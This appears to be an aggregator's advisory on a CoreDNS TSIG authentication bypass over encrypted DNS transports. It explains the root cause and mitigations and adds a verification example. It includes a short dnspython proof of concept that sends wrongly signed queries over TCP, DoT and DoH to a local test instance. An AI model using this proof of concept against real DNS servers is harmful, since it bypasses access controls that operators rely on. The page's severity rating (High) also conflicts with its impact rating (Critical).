CoreDNS, TSIG Authentication Bypass, CVE-2026-33190 (High)

How the mentioned CVE works:

The tsig plugin in CoreDNS decides whether an incoming TSIG was valid by calling w.TsigStatus() on the response writer (plugin/tsig/tsig.go). For plain DNS over UDP/TCP the transport correctly sets TsigSecret and carries out verification. On the non‑plain transports, however, the writer’s TsigStatus() either returns nil without performing any check or only checks the key name:
– DoH (https://): DoHWriter.TsigStatus() always returns nil (core/dnsserver/https.go).
– DoT (tls://): the TLS server builds a dns.Server without TsigSecret (core/dnsserver/server_tls.go).
– DoH3 (HTTP/3): reuses the same DoH writer, so it inherits the nil behavior (core/dnsserver/server_https3.go → core/dnsserver/https.go).
– DoQ (QUIC): DoQWriter.TsigStatus() is hard‑coded to return nil (core/dnsserver/quic.go).
– gRPC: gRPCresponse.TsigStatus() is likewise hard‑coded to return nil (core/dnsserver/server_grpc.go).
Because the plugin trusts these writer implementations instead of performing its own TSIG verification, a request signed with an invalid TSIG secret is rejected correctly over plain TCP (rcode=9 NOTAUTH) but is accepted over DoT, DoH, DoH3, DoQ, and gRPC, which return NOERROR (rcode=0) with an answer section. An attacker who does not know the shared secret can therefore satisfy `require all` directives on the affected transports.

dailycve form:

Platform: CoreDNS
Version: 1.14.2 and earlier
Vulnerability: TSIG authentication bypass
Severity: High
Date: 2026-04-25

Prediction: upgrade to 1.14.3

Analytics

What Undercode Says:

Clone the CoreDNS repository, check out the vulnerable version, build it, and run an instance with the tsig plugin:

```shell
# Clone CoreDNS repository and checkout vulnerable version
git clone https://github.com/coredns/coredns.git
cd coredns
git checkout v1.14.2
make   # builds the ./coredns binary used below

# Run a vulnerable CoreDNS instance with tsig plugin.
# Note: this Corefile only defines the plain-DNS listener on port 53; the DoT/DoH
# checks in the script below also need matching tls:// and https:// server blocks
# (with certificates) carrying the same tsig configuration.
cat > Corefile <<EOF
. {
    tsig example.com {
        secret somesecret.
    }
    forward . 8.8.8.8
}
EOF
./coredns -conf Corefile
```

tsig-repro.py, a minimal PoC (dnspython) to verify the TSIG bypass over DoT/DoH against the instance started above:

```python
# tsig-repro.py – minimal PoC to verify TSIG bypass over DoT/DoH
# Adjust COREDNS_BIN to point to your CoreDNS binary
import dns.message
import dns.query
import dns.tsig
import dns.name

keyname = dns.name.from_text("example.com")
secret = "somesecret."
# Use a completely wrong secret to simulate an invalid TSIG
wrong_secret = "wrongsecret"
tsig_ctx = dns.tsig.Key(keyname, secret, algorithm=dns.tsig.HMAC_MD5)
wrong_tsig_ctx = dns.tsig.Key(keyname, wrong_secret, algorithm=dns.tsig.HMAC_MD5)

q = dns.message.make_query("example.org.", "A")
q.use_tsig(keyring={keyname: wrong_tsig_ctx}, keyname=keyname)

# Over plain TCP -> expected NOTAUTH (rcode 9)
resp_tcp = dns.query.tcp(q, "127.0.0.1", port=53)
print(f"TCP response: {resp_tcp.rcode()}")

# Over DoT (tls://127.0.0.1:853) -> expected NOERROR (rcode 0)
resp_dot = dns.query.tls(q, "127.0.0.1", port=853)
print(f"DoT response: {resp_dot.rcode()}")

# Over DoH (https://127.0.0.1:443/dns-query) -> expected NOERROR (rcode 0)
resp_doh = dns.query.https(q, "https://127.0.0.1:443/dns-query")
print(f"DoH response: {resp_doh.rcode()}")
```

Exploit:

An unauthenticated remote attacker sends a DNS query over an affected encrypted transport (DoT, DoH, DoH3, DoQ, gRPC) with a TSIG record that is invalid, missing, or uses an incorrect secret. Because the transport writer’s `TsigStatus()` always returns nil, the tsig plugin incorrectly treats the request as authenticated and passes it to the rest of the plugin chain. This allows an adversary to bypass `require all` rules, gaining access to zone data, privileged queries, or any other resource the administrator intended to protect with TSIG.

Protection from this CVE

  • Upgrade to CoreDNS version 1.14.3 or later, where affected transports are modified to perform TSIG verification directly or to correctly signal a verification failure.
  • Workaround: Restrict access to DoT, DoH, DoH3, DoQ, and gRPC listeners to trusted networks only, effectively reducing the attack surface.
  • Audit configurations that rely on `tsig { require all }` and ensure they are not exposed on unpatched versions.
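The fix direction in the first item above, performing TSIG verification in the plugin itself rather than trusting a transport writer's TsigStatus(), is illustrated by the following stand-alone example. It is added here and is not CoreDNS or miekg/dns code: it implements RFC 8945 request signing and verification for hmac-sha256 over raw DNS wire bytes using only the Python standard library, and returns an explicit status for every outcome (verified, no TSIG present, bad key, bad signature, bad time, malformed) so that "nothing was checked" can never be mistaken for "verified". It also covers the unsigned-request case from the Exploit section: under `require all` semantics an unsigned query is rejected as well. All function names, the key name `example.com.`, the secret and the query name are the example's own constructed values.

```python
"""TSIG (RFC 8945) request signing and verification over raw DNS wire bytes, hmac-sha256 only.

Added example for this advisory, not CoreDNS code. It shows what a plugin must do to
verify a TSIG itself instead of trusting a transport writer's TsigStatus(): every outcome
is an explicit status, so "nothing was checked" never looks like "verified".
Key names, secrets and the query name used below are constructed sample values.
"""
import hashlib
import hmac
import struct
import time

TSIG_TYPE = 250          # RR type code for TSIG
ALG = "hmac-sha256."     # the only algorithm this example implements


def encode_name(name):
    """Text name -> uncompressed wire format, lowercased (TSIG canonical form)."""
    out = b""
    for label in name.lower().rstrip(".").split("."):
        if label:
            out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def read_name(buf, off):
    """Read an uncompressed name -> (text, new_off); (None, off) if a compression pointer is hit."""
    labels = []
    while True:
        n = buf[off]
        if n == 0:
            return ".".join(labels) + ".", off + 1
        if n & 0xC0:
            return None, off  # names inside the TSIG RR must not be compressed
        labels.append(buf[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n


def skip_name(buf, off):
    """Skip a possibly compressed name and return the offset after it."""
    while buf[off] != 0 and not buf[off] & 0xC0:
        off += 1 + buf[off]
    return off + (2 if buf[off] & 0xC0 else 1)


def skip_rr(buf, off):
    """Skip one resource record (name, type, class, ttl, rdlength, rdata)."""
    off = skip_name(buf, off)
    rdlen = struct.unpack("!H", buf[off + 8:off + 10])[0]
    return off + 10 + rdlen


def build_query(qname, qtype=1, msg_id=0x1234):
    """Minimal unsigned query: header with QDCOUNT=1 plus one question (constructed input)."""
    return struct.pack("!HHHHHH", msg_id, 0x0100, 1, 0, 0, 0) + encode_name(qname) + struct.pack("!HH", qtype, 1)


def tsig_variables(keyname_wire, alg_wire, time_signed, fudge, error=0, other=b""):
    """'TSIG variables' appended to the message when computing the MAC (RFC 8945 section 4.3.3)."""
    return (keyname_wire + struct.pack("!HI", 255, 0) + alg_wire + time_signed.to_bytes(6, "big")
            + struct.pack("!HHH", fudge, error, len(other)) + other)


def sign(msg, keyname, secret, now=None, fudge=300):
    """Append a TSIG RR to an unsigned request; a request MAC covers message + TSIG variables."""
    now = int(time.time()) if now is None else now
    kn, alg = encode_name(keyname), encode_name(ALG)
    mac = hmac.new(secret, msg + tsig_variables(kn, alg, now, fudge), hashlib.sha256).digest()
    msg_id, arcount = struct.unpack("!H", msg[:2])[0], struct.unpack("!H", msg[10:12])[0]
    rdata = (alg + now.to_bytes(6, "big") + struct.pack("!HH", fudge, len(mac)) + mac
             + struct.pack("!HHH", msg_id, 0, 0))                 # original ID, error, other len
    rr = kn + struct.pack("!HHIH", TSIG_TYPE, 255, 0, len(rdata)) + rdata  # class ANY, TTL 0
    return msg[:10] + struct.pack("!H", arcount + 1) + msg[12:] + rr


def verify(signed, keyring, now=None):
    """Verify the TSIG on a raw request: 'NOERROR' when verified, 'MISSING' when no TSIG RR is
    present, 'FORMERR' when unparseable, else the RFC 8945 error name (BADKEY/BADSIG/BADTIME)."""
    try:
        _, _, qd, an, ns, ar = struct.unpack("!HHHHHH", signed[:12])
        if ar == 0:
            return "MISSING"
        off = 12
        for _ in range(qd):
            off = skip_name(signed, off) + 4
        for _ in range(an + ns + ar - 1):   # the TSIG RR must be the last additional record
            off = skip_rr(signed, off)
        tsig_start = off
        keyname, off = read_name(signed, off)
        if keyname is None:
            return "FORMERR"
        rtype, _, _, rdlen = struct.unpack("!HHIH", signed[off:off + 10])
        if rtype != TSIG_TYPE:
            return "MISSING"
        rd = signed[off + 10:off + 10 + rdlen]
        alg, p = read_name(rd, 0)
        time_signed = int.from_bytes(rd[p:p + 6], "big")
        fudge, mac_size = struct.unpack("!HH", rd[p + 6:p + 10])
        mac = rd[p + 10:p + 10 + mac_size]
        q = p + 10 + mac_size
        orig_id, error, other_len = struct.unpack("!HHH", rd[q:q + 6])
        other = rd[q + 6:q + 6 + other_len]
    except (IndexError, struct.error, UnicodeDecodeError):
        return "FORMERR"
    secret = keyring.get(keyname)
    if alg != ALG or secret is None:
        return "BADKEY"   # unknown key or algorithm (RFC 8945 section 5.2.1)
    # Rebuild the message exactly as it was before signing: original ID, ARCOUNT-1, TSIG RR removed.
    unsigned = struct.pack("!H", orig_id) + signed[2:10] + struct.pack("!H", ar - 1) + signed[12:tsig_start]
    variables = tsig_variables(encode_name(keyname), encode_name(alg), time_signed, fudge, error, other)
    expected = hmac.new(secret, unsigned + variables, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, mac):
        return "BADSIG"
    now = int(time.time()) if now is None else now
    if abs(now - time_signed) > fudge:
        return "BADTIME"
    return "NOERROR"


def authorize(raw, keyring, require_all=True, now=None):
    """Fail-closed decision made from the plugin's own verification result -> (accepted, status).
    With require_all an unsigned request is rejected too; a bad TSIG is never accepted."""
    status = verify(raw, keyring, now)
    if status == "NOERROR":
        return True, status
    if status == "MISSING" and not require_all:
        return True, status   # unsigned queries are only tolerated when nothing requires TSIG
    return False, status      # the page's plain-TCP behaviour: a bad TSIG is rejected (NOTAUTH, rcode 9)


if __name__ == "__main__":
    KEY = b"constructed-secret"              # constructed sample secret
    ring = {"example.com.": KEY}             # constructed sample key name
    q = build_query("example.org.")
    signed = sign(q, "example.com.", KEY)
    print("good key  :", authorize(signed, ring))
    print("wrong key :", authorize(signed, {"example.com.": b"wrongsecret"}))
    print("unsigned  :", authorize(q, ring))
```

The point of `verify()` returning a string for every path is the design lesson from this CVE: a status that is `nil`/`None` both when verification succeeded and when it was never attempted cannot be distinguished by the caller, so the caller must either own the verification (as here) or treat "not checked" as a failure.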

Impact:

Critical – Unauthenticated network attackers can completely bypass TSIG‑based authentication and authorization on all encrypted DNS transports, gaining the same privileges as a legitimate TSIG‑authenticated client. This can lead to unauthorized data exfiltration, manipulation of DNS responses, and compromise of any security policies that depend on TSIG.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
